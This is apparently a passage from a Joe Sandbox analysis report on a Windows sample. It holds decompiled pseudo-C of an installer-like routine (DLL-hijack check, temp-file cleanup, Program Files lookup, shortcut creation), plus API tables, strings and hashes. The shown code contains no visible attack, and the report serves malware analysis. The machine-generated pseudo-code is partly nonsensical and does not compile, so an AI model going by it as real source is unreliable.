						CloseHandle(_t205);
						_t201 = 0x800;
						goto L14;
					} else {
						_t164 = ReadFile(_t205,  &_a13256, 0x7ffe,  &_v0, 0);
						_t222 = _t164;
						if(_t164 == 0) {
							goto L13;
						}
						_t182 = 0;
						_push(0x104);
						 *((short*)(_t210 + 0x33dc + (_v0 >> 1) * 2)) = 0;
						_push( &_a248);
						_push( &_a13256);
						while(1) {
							_t197 = E00BAFB18(_t222);
							_t223 = _t197;
							if(_t197 == 0) {
								goto L13;
							}
							E00BAFFE3( &_a248);
							_push(0x104);
							_push( &_a244);
							_push(_t197);
						}
						goto L13;
					}
				}
				_t173 = GetProcAddress(_t200, "SetDllDirectoryW");
				_t180 = _a46028;
				_t198 = _t173;
				if(_t198 != 0) {
					asm("sbb ecx, ecx");
					_t182 = _t198;
					 *0xbd2260( ~(_t180 & 0x000000ff) & 0x00bd25b4);
					 *_t198();
				}
				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0xbd2260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}

0x00bb0032
0x00bb0038
0x00bb0040
0x00bb0048
0x00bb004c
0x00bb00b2
0x00bb00b2
0x00bb00b7
0x00bb00ba
0x00bb00c2
0x00bb00c7
0x00bb00cf
0x00bb00da
0x00bb00e2
0x00bb00ea
0x00bb00f2
0x00bb00fa
0x00bb0102
0x00bb010a
0x00bb0112
0x00bb011a
0x00bb0122
0x00bb012a
0x00bb0132
0x00bb013a
0x00bb0142
0x00bb014a
0x00bb0152
0x00bb015a
0x00bb0162
0x00bb016a
0x00bb0172
0x00bb017a
0x00bb0182
0x00bb018a
0x00bb0192
0x00bb019a
0x00bb01a5
0x00bb01b0
0x00bb01bb
0x00bb01c6
0x00bb01d1
0x00bb01dc
0x00bb01e7
0x00bb01f2
0x00bb01fd
0x00bb0208
0x00bb0213
0x00bb021e
0x00bb0229
0x00bb0234
0x00bb023f
0x00bb024a
0x00bb0255
0x00bb0260
0x00bb026b
0x00bb0276
0x00bb0281
0x00bb028c
0x00bb0297
0x00bb02a2
0x00bb02ad
0x00bb02b8
0x00bb02c3
0x00bb02ce
0x00bb02d9
0x00bb02e4
0x00bb02ef
0x00bb02fa
0x00bb0305
0x00bb0310
0x00bb03e2
0x00bb03ed
0x00bb040a
0x00bb040f
0x00bb0411
0x00bb0413
0x00bb041d
0x00bb042a
0x00bb042a
0x00bb041f
0x00bb0423
0x00bb0423
0x00bb042e
0x00bb0450
0x00bb0450
0x00bb0461
0x00bb046e
0x00bb0476
0x00bb0480
0x00bb0484
0x00bb0486
0x00bb04be
0x00bb04be
0x00bb04c0
0x00bb05d7
0x00bb05d7
0x00bb04ce
0x00bb04dd
0x00bb054c
0x00bb0554
0x00bb0568
0x00bb056d
0x00bb0570
0x00bb0576
0x00bb0578
0x00bb0581
0x00bb0596
0x00bb05ae
0x00bb05b9
0x00bb05bf
0x00bb05bf
0x00bb04df
0x00bb04e4
0x00bb04ee
0x00bb04fa
0x00bb0502
0x00bb051c
0x00bb0521
0x00bb053b
0x00bb053b
0x00bb05c7
0x00bb05c7
0x00bb0488
0x00bb048a
0x00bb048a
0x00bb049b
0x00bb04a8
0x00bb04b0
0x00000000
0x00000000
0x00bb04b2
0x00bb04b6
0x00000000
0x00000000
0x00000000
0x00bb04b8
0x00bb04ba
0x00000000
0x00bb04ba
0x00bb0430
0x00bb0445
0x00bb044b
0x00bb044e
0x00000000
0x00000000
0x00000000
0x00bb044e
0x00bb0478
0x00bb0478
0x00bb0479
0x00000000
0x00bb047e
0x00bb031c
0x00bb031e
0x00bb0321
0x00000000
0x00000000
0x00bb0332
0x00bb0354
0x00bb0358
0x00bb03d6
0x00bb03d7
0x00bb03dd
0x00000000
0x00bb036a
0x00bb037f
0x00bb0385
0x00bb0387
0x00000000
0x00000000
0x00bb038f
0x00bb0391
0x00bb0396
0x00bb03a5
0x00bb03ad
0x00bb03cb
0x00bb03d0
0x00bb03d2
0x00bb03d4
0x00000000
0x00000000
0x00bb03b8
0x00bb03bd
0x00bb03c9
0x00bb03ca
0x00bb03ca
0x00000000
0x00bb03cb
0x00bb0358
0x00bb0054
0x00bb005a
0x00bb0061
0x00bb0065
0x00bb006c
0x00bb0075
0x00bb0077
0x00bb007d
0x00bb007d
0x00bb008b
0x00bb008f
0x00bb00a6
0x00bb00a8
0x00bb00ae
0x00bb00b0
0x00bb00b0
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 00BB0042
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00BB0054
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00BB0085
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BB0332
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BB034E
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BB0360
ReadFile.KERNEL32(00000000,?,00007FFE,00BD2BA4,00000000), ref: 00BB037F
CloseHandle.KERNEL32(00000000), ref: 00BB03D7
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00BB03ED
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00BB0445
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00BB046E
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00BB04A8

Part of subcall function 00BAFFE3: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BAFFFE
Part of subcall function 00BAFFE3: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BAEAC6,Crypt32.dll,00000000,00BAEB4A,?,?,00BAEB2C,?,?,?), ref: 00BB0020

_swprintf.LIBCMT ref: 00BB051C
_swprintf.LIBCMT ref: 00BB0568

Part of subcall function 00BA3FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA3FE9

AllocConsole.KERNEL32 ref: 00BB0570
GetCurrentProcessId.KERNEL32 ref: 00BB057A
AttachConsole.KERNEL32(00000000), ref: 00BB0581
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00BB05A7
WriteConsoleW.KERNEL32(00000000), ref: 00BB05AE
Sleep.KERNEL32(00002710), ref: 00BB05B9
FreeConsole.KERNEL32 ref: 00BB05BF
ExitProcess.KERNEL32 ref: 00BB05C7

Strings

SetDefaultDllDirectories, xrefs: 00BB007F
kernel32, xrefs: 00BB003B
uxtheme.dll, xrefs: 00BB04E9
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00BB0556
SetDllDirectoryW, xrefs: 00BB004E
DXGIDebug.dll, xrefs: 00BB00C7, 00BB0431
dwmapi.dll, xrefs: 00BB00F2, 00BB04DF

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 2f31d962b146fe2a774db60b875e4947324446adfbae64e95519ac751c8d056a
Instruction ID: 025ff16c753e0e148bb9683e2fbb00ab0699e1bd27bb60a3bf13f721c3dc881d
Opcode Fuzzy Hash: 2f31d962b146fe2a774db60b875e4947324446adfbae64e95519ac751c8d056a
Instruction Fuzzy Hash: 34D17BB21193C49BD331AF50D849BEFFBE8EB95704F40099EF58997250EBB08548CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BBBD35 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00BBBD35(void* __edx) {
				intOrPtr _t213;
				void* _t218;
				intOrPtr _t274;
				void* _t287;
				signed int _t289;
				void* _t293;
				signed int _t294;
				void* _t298;

				_t287 = __edx;
				E00BBE0E4(E00BD1E93, _t298);
				_t213 = 0x1bc80;
				E00BBE1C0();
				if( *((intOrPtr*)(_t298 + 0xc)) == 0) {
					L167:
					 *[fs:0x0] =  *((intOrPtr*)(_t298 - 0xc));
					return _t213;
				}
				_push(0x1000);
				_push(_t298 - 0xe);
				_push(_t298 - 0xd);
				_push(_t298 - 0x5c84);
				_push(_t298 - 0xfc8c);
				_push( *((intOrPtr*)(_t298 + 0xc)));
				_t213 = E00BBA986();
				 *((intOrPtr*)(_t298 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t274 =  *((intOrPtr*)(_t298 + 0x10));
					do {
						_t218 = _t298 - 0x5c84;
						_t293 = _t298 - 0x1bc8c;
						_t289 = 6;
						goto L4;
						L6:
						while(E00BB1708(_t298 - 0xfc8c,  *((intOrPtr*)(0xbdd618 + _t294 * 4))) != 0) {
							_t294 = _t294 + 1;
							if(_t294 < 0xe) {
								continue;
							} else {
								goto L165;
							}
						}
						if(_t294 > 0xd) {
							goto L165;
						}
						switch( *((intOrPtr*)(_t294 * 4 +  &M00BBC929))) {
							case 0:
								__eflags = _t274 - 2;
								if(_t274 == 2) {
									E00BB9D58(_t298 - 0x7c84, 0x800);
									E00BAA3DD(E00BAB8A5(_t298 - 0x7c84, _t298 - 0x5c84, _t298 - 0xdc8c, 0x800), _t274, _t298 - 0x8c8c, _t294);
									 *(_t298 - 4) = 0;
									E00BAA517(_t298 - 0x8c8c, _t298 - 0xdc8c);
									E00BA7098(_t298 - 0x3c84);
									while(1) {
										_push(0);
										_t282 = _t298 - 0x8c8c;
										_t236 = E00BAA46A(_t298 - 0x8c8c, _t287, _t298 - 0x3c84);
										__eflags = _t236;
										if(_t236 == 0) {
											break;
										}
										SetFileAttributesW(_t298 - 0x3c84, 0);
										__eflags =  *(_t298 - 0x2c78);
										if(__eflags == 0) {
											L18:
											_t240 = GetFileAttributesW(_t298 - 0x3c84);
											__eflags = _t240 - 0xffffffff;
											if(_t240 == 0xffffffff) {
												continue;
											}
											_t242 = DeleteFileW(_t298 - 0x3c84);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												_t296 = 0;
												_push(0);
												goto L22;
												L22:
												E00BA3FD6(_t298 - 0x103c, 0x800, L"%s.%d.tmp", _t298 - 0x3c84);
												_t300 = _t300 + 0x14;
												_t247 = GetFileAttributesW(_t298 - 0x103c);
												__eflags = _t247 - 0xffffffff;
												if(_t247 != 0xffffffff) {
													_t296 = _t296 + 1;
													__eflags = _t296;
													_push(_t296);
													goto L22;
												} else {
													_t250 = MoveFileW(_t298 - 0x3c84, _t298 - 0x103c);
													__eflags = _t250;
													if(_t250 != 0) {
														MoveFileExW(_t298 - 0x103c, 0, 4);
													}
													continue;
												}
											}
										}
										E00BAB437(_t282, __eflags, _t298 - 0x7c84, _t298 - 0x103c, 0x800);
										E00BAB147(__eflags, _t298 - 0x103c, 0x800);
										_t297 = E00BC33F3(_t298 - 0x7c84);
										__eflags = _t297 - 4;
										if(_t297 < 4) {
											L16:
											_t261 = E00BAB865(_t298 - 0x5c84);
											__eflags = _t261;
											if(_t261 != 0) {
												break;
											}
											L17:
											_t264 = E00BC33F3(_t298 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t298 + _t264 * 2 - 0x3c82)) = 0;
											E00BBF1A0(0x800, _t298 - 0x3c, 0, 0x1e);
											_t300 = _t300 + 0x10;
											 *((intOrPtr*)(_t298 - 0x38)) = 3;
											_push(0x14);
											_pop(_t267);
											 *((short*)(_t298 - 0x2c)) = _t267;
											 *((intOrPtr*)(_t298 - 0x34)) = _t298 - 0x3c84;
											_push(_t298 - 0x3c);
											 *0xc01074();
											goto L18;
										}
										_t272 = E00BC33F3(_t298 - 0x103c);
										__eflags = _t297 - _t272;
										if(_t297 > _t272) {
											goto L17;
										}
										goto L16;
									}
									 *(_t298 - 4) =  *(_t298 - 4) | 0xffffffff;
									E00BAA3F3(_t298 - 0x8c8c);
								}
								goto L165;
							case 1:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L165;
								} else {
									__eax =  *0xbfcc7c;
									__eflags =  *0xbfcc7c;
									__ebx = __ebx & 0xffffff00 |  *0xbfcc7c == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0xbfcc7c;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E00BBAAEA(__ecx, __edx, __eflags);
										__eax =  *0xbfcc7c;
									} else {
										__esi = __ebp - 0x5c84;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E00BC33F3(__esi);
									__eax = __edi + __eax;
									_push(__eax);
									_push( *0xbfcc7c);
									__eax = E00BC341E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax == 0) {
										L39:
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L00BC340E(__esi);
										}
										goto L165;
									}
									 *0xbfcc7c = __eax;
									__eflags = __bl;
									if(__bl != 0) {
										__ecx = 0;
										__eflags = 0;
										 *__eax = __cx;
									}
									__eax = E00BC6FAD(__eax, __esi);
									_pop(__ecx);
									_pop(__ecx);
									goto L39;
								}
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L165;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L165;
								}
								__eflags =  *0xbe9472 - __di;
								if( *0xbe9472 != __di) {
									goto L165;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E00BC33F3(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L165;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x103c = E00BAFD96(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E00BC161B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0xbe9472;
											E00BAFD96(0xbe9472, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E00BBA81F(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0xbe9472); // executed
											__eax = __ebp - 0x103c;
											__eax = E00BC3429(__ebp - 0x103c, 0xbe9472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x103c);
											}
											goto L165;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x18;
											__ebx = 0;
											_push(__ebp - 0x18);
											_push(1);
											_push(0);
											_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
											_push(0x80000002);
											__eax =  *0xc01028();
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												_push(__ebp - 0x14);
												__eax = __ebp - 0x103c;
												_push(__ebp - 0x103c);
												__eax = __ebp - 0x1c;
												_push(__ebp - 0x1c);
												_push(0);
												_push(L"ProgramFilesDir");
												_push( *(__ebp - 0x18));
												__eax =  *0xc01024();
												_push( *(__ebp - 0x18));
												 *0xc01004() =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E00BC33F3(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E00BAFD6E(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E00BC33F3(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E00BAFD6E(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L165;
									}
									__ebp - 0x103c = E00BAFD96(__ebp - 0x103c, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0xbe946c - 1;
								__eflags = __eax - 0xbe946c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0xbe7442 = __cl;
									 *0xbe7443 = 1;
									goto L165;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0xbe7442 = __cl;
									L81:
									 *0xbe7443 = __cl;
									goto L165;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L165;
								}
								 *0xbe7442 = 1;
								goto L81;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L92;
								}
								__eax = __ebp - 0x5c84;
								__eax = E00BC3429(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L92;
								}
								_push(__edi);
								goto L91;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L113:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0xbe946c;
										if( *0xbe946c == 0) {
											 *0xbe946c = 2;
										}
										 *0xbe8468 = 1;
									}
									goto L165;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E00BAB147(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0xbdd5f8);
									__ebp - 0x7c84 = E00BA3FD6(0xbe846a, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E00BAA0C0(0xbe846a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xbe846a);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L165;
								}
								__eflags =  *0xbf5b72;
								if( *0xbf5b72 != 0) {
									goto L165;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E00BC1438(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L109:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E00BAFD96(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E00BAFD96(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E00BBA472(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E00BB9EB3( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L165;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0xbe7447 = 1;
										 *0xbe846a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L113;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L109;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L109;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E00BAFD96(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L109;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E00BC6F4C(__ebx, __edi);
										_pop(__ecx);
										 *0xbfdc8c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0xbfdc88 = E00BBAAEA(__ecx, __edx, __eflags);
								}
								 *0xbf5b73 = 1;
								goto L165;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L92:
									 *0xbfdc90 = 1;
									goto L165;
								}
								_push(1);
								L91:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E00BBCC9F(__ebp);
								goto L92;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L165;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E00BC6280( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0xbfab7a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E00BAFD96();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0xbf9b7a);
										_push(__eax);
										__eax = E00BAFD96();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0xbfbb7a);
										_push(__eax);
										__eax = E00BAFD96();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E00BC5646(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E00BAA0C0(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L150;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L150;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L138:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E00BAA0C0(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L146:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L147;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L144:
												_push(__eax);
												__eax = E00BC5646();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L146;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L144;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L147;
										}
										goto L138;
										L147:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L150;
								} else {
									__ebp - 0x19c8a = __ebp - 0x6c84;
									E00BC5646(__ebp - 0x6c84, __ebp - 0x19c8a) = __ebp - 0x6c82;
									_push(__ebx);
									_push(__ebp - 0x6c82);
									__eax = E00BC1438(__ecx);
									__esp = __esp + 0x10;
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1c3c = E00BC5646(__ebp - 0x1c3c, __ebp - 0x1c3c);
										_pop(__ecx);
										_pop(__ecx);
									}
									L150:
									__eflags =  *((short*)(__ebp - 0x11c8c));
									__ebx = 0x800;
									if( *((short*)(__ebp - 0x11c8c)) != 0) {
										__ebp - 0x9c8c = __ebp - 0x11c8c;
										__eax = E00BAB179(__ebp - 0x11c8c, __ebp - 0x9c8c, 0x800);
									}
									__ebp - 0xbc8c = __ebp - 0x6c84;
									__eax = E00BAB179(__ebp - 0x6c84, __ebp - 0xbc8c, __ebx);
									__eflags =  *(__ebp - 0x2c3c);
									if(__eflags == 0) {
										__ebp - 0x2c3c = E00BBAA7E(__ecx, __ebp - 0x2c3c,  *(__ebp - 0x14)); // executed
									}
									__ebp - 0x2c3c = E00BAB147(__eflags, __ebp - 0x2c3c, __ebx);
									__eflags =  *((short*)(__ebp - 0x17c8c));
									if(__eflags != 0) {
										__ebp - 0x17c8c = __ebp - 0x2c3c;
										E00BAFD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x17c8c, __ebx) = __ebp - 0x2c3c;
										__eax = E00BAB147(__eflags, __ebp - 0x2c3c, __ebx);
									}
									__ebp - 0x2c3c = __ebp - 0xcc8c;
									__eax = E00BC5646(__ebp - 0xcc8c, __ebp - 0x2c3c);
									__eflags =  *(__ebp - 0x13c8c);
									__eax = __ebp - 0x13c8c;
									_pop(__ecx);
									_pop(__ecx);
									if(__eflags == 0) {
										__eax = __ebp - 0x19c8c;
									}
									__ebp - 0x2c3c = E00BAFD6E(__eflags, __ebp - 0x2c3c, __ebp - 0x2c3c, __ebx);
									__eax = __ebp - 0x2c3c;
									__eflags = E00BAB3D3(__ebp - 0x2c3c);
									if(__eflags == 0) {
										L160:
										__ebp - 0x2c3c = E00BAFD6E(__eflags, __ebp - 0x2c3c, L".lnk", __ebx);
										goto L161;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L161:
											_push(1);
